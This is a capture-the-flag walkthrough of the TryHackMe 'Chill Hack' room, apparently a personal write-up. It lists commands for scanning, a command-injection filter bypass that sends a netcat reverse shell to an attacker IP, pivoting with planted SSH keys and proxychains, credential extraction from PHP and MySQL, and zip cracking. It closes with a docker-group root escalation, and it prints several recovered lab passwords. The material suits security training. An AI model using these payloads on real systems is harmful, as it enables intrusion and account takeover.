Chill Hack
Room Link: https://tryhackme.com/room/chillhack
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
No other ports found.
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
A lot of commands ran will result in this page.
Command Injection
Used this to find a way to bypass the filter. by adding a \ in the middle of the first command, it treats the command as a new line so it allows us to run any command we want.
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
Web
r\m /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.172.186 1337 >/tmp/fKali
nc -lvnp 1337Victim
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
Victim
sudo -u apaar /home/apaar/.helpline.sh
/bin/bash
/bin/bash
Victim(apaar)
python3 -c 'import pty; pty.spawn("/bin/bash")'Victim(apaar)
netstat -at
curl localhost:9001
Pivot
Kali
ssh-keygen -t rsa
cat /root/.ssh/id_rsa.pubVictim
copy id_rsa.pub to /home/apaar/.ssh/authorized_keysKali
vi /etc/proxychains.confproxychains.conf
socks4 127.0.0.1 9050Kali
ssh -D 9050 apaar@VICTIM
I can now see the webpage from Kali but no login credentials to use.
Found credentials for mysql in one of the php files.
Victim(apaar)
cat /var/www/files/index.php
Victim(apaar)
mysql -u root -p webportal
Password: !@m+her00+@dbVictim(mysql)
SHOW DATABASES;
use webportal;
SHOW TABLES;
select * from users;
Both set of credentials work on the login page, both bring up this page.
Used no password
Kali
steghide extract -sf hacker-with-laptop_23-2147985341.jpg
Cracking Password Protected Zip Files
Kali
zip2john backup.zip > secure_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt secure_john.txt 
Kali
unzip backup.zip
Password: pass1word
Kali
cat source_code.php
echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d
Victim(apaar)
su anurodh
Password: !d0ntKn0wmYp@ssw0rd
Privilege Escalation
anurodh is apart of a docker group which the other user was not apart of, looking at gtfo bins theres a way to get a shell so I tried it and got root
Link: https://gtfobins.github.io/gtfobins/docker/#shell
Victim(anurodh)
groups
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Last updated